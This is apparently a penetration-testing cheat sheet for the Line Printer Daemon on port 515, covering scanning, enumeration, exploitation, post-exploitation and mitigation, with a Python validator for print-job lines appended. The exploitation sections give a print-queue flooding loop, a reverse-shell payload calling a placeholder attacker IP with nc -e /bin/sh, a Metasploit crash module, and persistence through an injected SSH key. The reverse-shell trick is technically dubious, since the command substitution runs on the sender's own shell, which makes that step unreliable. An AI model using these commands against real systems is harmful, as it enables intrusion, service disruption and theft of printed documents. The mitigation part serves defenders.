Line Printer Daemon (LPD) - Port 515

Basic Info

  • Port Number: 515

  • Service: Line Printer Daemon (LPD)

  • Common Usage: LPD is a network printing protocol used to manage print jobs on UNIX and Linux systems. It allows remote computers to submit print jobs to a central print server.

  • Default State: Open on many older UNIX/Linux distributions, but often disabled in modern systems.

  • Security Concerns:

    • Lacks authentication, allowing unauthorized access if improperly configured.

    • Susceptible to command injection and buffer overflow attacks.

    • Can be used for denial-of-service (DoS) attacks by sending large or malformed print jobs.

    • Print job manipulation may allow sensitive document interception.


How to Connect

Manually Connecting to LPD

LPD listens on port 515 and operates by receiving print job commands. You can interact with it manually using netcat or telnet:

nc -v [Target-IP] 515

If the connection succeeds, a service is listening on port 515 and can be enumerated further.

On a host where you have local access, you can also check the /etc/printcap file (if readable) to see the configured printers:

cat /etc/printcap

Reconnaissance (Recon)

Scanning for Port 515

Use Nmap to detect if the LPD service is running:

nmap -p 515 -sV -T4 [Target-IP]

Expected output:

515/tcp open  printer  Line Printer Daemon (LPD)

For a deeper scan using NSE scripts:

nmap --script=lpd-enum -p 515 [Target-IP]

This will attempt to enumerate available printers and configurations.


Enumeration

Checking Printer Queues

If LPD is running, you can list print queues using:

lpq -S [Target-IP]

If no authentication is required, this command may reveal active print jobs.

Enumerating Available Printers

Try checking the configuration of remote printers:

lpstat -v -h [Target-IP]

If a printer is misconfigured, it might allow arbitrary command execution.


Attack Vector

  • Anonymous Printing Abuse – If LPD is open and does not require authentication, an attacker can send unlimited print jobs, leading to resource exhaustion (Denial of Service).

  • Command Injection in Print Jobs – Certain LPD implementations allow escape sequences that can lead to remote code execution.

  • Directory Traversal – Some older LPD implementations allow path traversal, enabling an attacker to overwrite files outside the spool directory.

  • Print Job Interception – If an attacker gains access, they may be able to capture sensitive documents submitted for printing.


Exploitation

Exploiting Open Print Queue for DoS

Send a large number of print jobs to overwhelm the system:

for i in {1..1000}; do
  echo "Fake print job $i" | lpr -S [Target-IP] -P [Printer-Name]
done

This fills the print queue, preventing legitimate users from printing.

Command Injection via LPD Escape Sequences

Some LPD services allow malicious escape sequences that execute shell commands. Try submitting a print job with a malicious payload:

echo -e "\033[31m$(nc -e /bin/sh [Attacker-IP] 4444)\033[0m" | lpr -S [Target-IP] -P [Printer-Name]

If successful, this opens a reverse shell on the target system.

Metasploit Exploit for LPD

Metasploit has modules that can exploit LPD misconfigurations:

use auxiliary/dos/lpd/lpd_crash
set RHOSTS [Target-IP]
exploit

This attempts to crash the LPD service.


Tools Used

  • Nmap – Scanning and service detection

  • LPQ / LPSTAT – Printer queue enumeration

  • Netcat (nc) – Manual interaction and exploitation

  • Hydra – Brute-force login attempts (if authentication is enabled)

  • Metasploit – LPD-specific exploits and auxiliary modules

  • Burp Suite – If a web-based printer management interface is available


Post-Exploitation

Privilege Escalation

If you gain access through LPD, check for SUID binaries to escalate privileges:

find / -perm -4000 -type f 2>/dev/null

Maintaining Access

To maintain persistence, add an SSH key to the target machine:

echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys

Extracting Sensitive Print Jobs

If access is gained, look for spool files that contain document data:

ls -lah /var/spool/lpd/

Print jobs often contain PII (Personally Identifiable Information) or sensitive corporate data.


Mitigation & Defense

To secure against LPD exploitation:

✅ Disable LPD if not required:

systemctl stop lpd
systemctl disable lpd

✅ Restrict access using firewall rules:

iptables -A INPUT -p tcp --dport 515 -s [Trusted-IP] -j ACCEPT
iptables -A INPUT -p tcp --dport 515 -j DROP

✅ Enforce authentication for print jobs and disable guest access.

✅ Use modern alternatives like CUPS (Common Unix Printing System) with encrypted communication.
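Where an LPD-compatible listener has to stay in service, the directory traversal and oversized-job issues listed under Attack Vector come down to validating the RFC 1179 receive-job lines before any spool file is created. The sketch below is an added example, not code from any LPD implementation; the size limit, the queue-name pattern and the rule that the host in the file name must equal the connecting peer are assumptions chosen for illustration.

```python
import re

# Assumed policy limit for this example (not from the page).
MAX_JOB_BYTES = 50 * 1024 * 1024
# RFC 1179 names: "cfA"/"dfA" + three-digit job number + originating host name.
NAME_RE = re.compile(rb"(cf|df)[A-Za-z](\d{3})([A-Za-z0-9][A-Za-z0-9.-]{0,62})")
# Assumed queue-name policy: short, no path separators or dots.
QUEUE_RE = re.compile(rb"[A-Za-z0-9_-]{1,32}")


def check_receive_job(line: bytes) -> str:
    """Validate the daemon command 0x02 <queue> LF and return the queue name."""
    if not line.endswith(b"\n") or line[:1] != b"\x02":
        raise ValueError("not a receive-job command")
    queue = line[1:-1]
    if not QUEUE_RE.fullmatch(queue):
        raise ValueError("queue name rejected")
    return queue.decode("ascii")


def check_subcommand(line: bytes, peer_host: str) -> tuple[str, int, str]:
    """Validate 0x02/0x03 <count> SP <name> LF before any file is created."""
    if not line.endswith(b"\n") or line[:1] not in (b"\x02", b"\x03"):
        raise ValueError("unknown subcommand")
    kind = "control" if line[:1] == b"\x02" else "data"
    count, sep, name = line[1:-1].partition(b" ")
    if not sep or not count.isdigit() or len(count) > 12:
        raise ValueError("bad byte count")
    size = int(count)
    if size > MAX_JOB_BYTES:
        raise ValueError("job exceeds size limit")
    # fullmatch allows no '/', '..' or embedded newline, so the name cannot
    # point outside the spool directory.
    m = NAME_RE.fullmatch(name)
    if not m:
        raise ValueError("file name rejected")
    if m.group(1) != (b"cf" if kind == "control" else b"df"):
        raise ValueError("prefix does not match subcommand")
    # Assumed strict policy: host part must equal the connecting peer's name.
    if m.group(3).decode("ascii").lower() != peer_host.lower():
        raise ValueError("host in file name does not match peer")
    return kind, size, name.decode("ascii")
```

A rejected line should close the connection and be logged with the peer address, so repeated rejections from one source are visible to monitoring.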

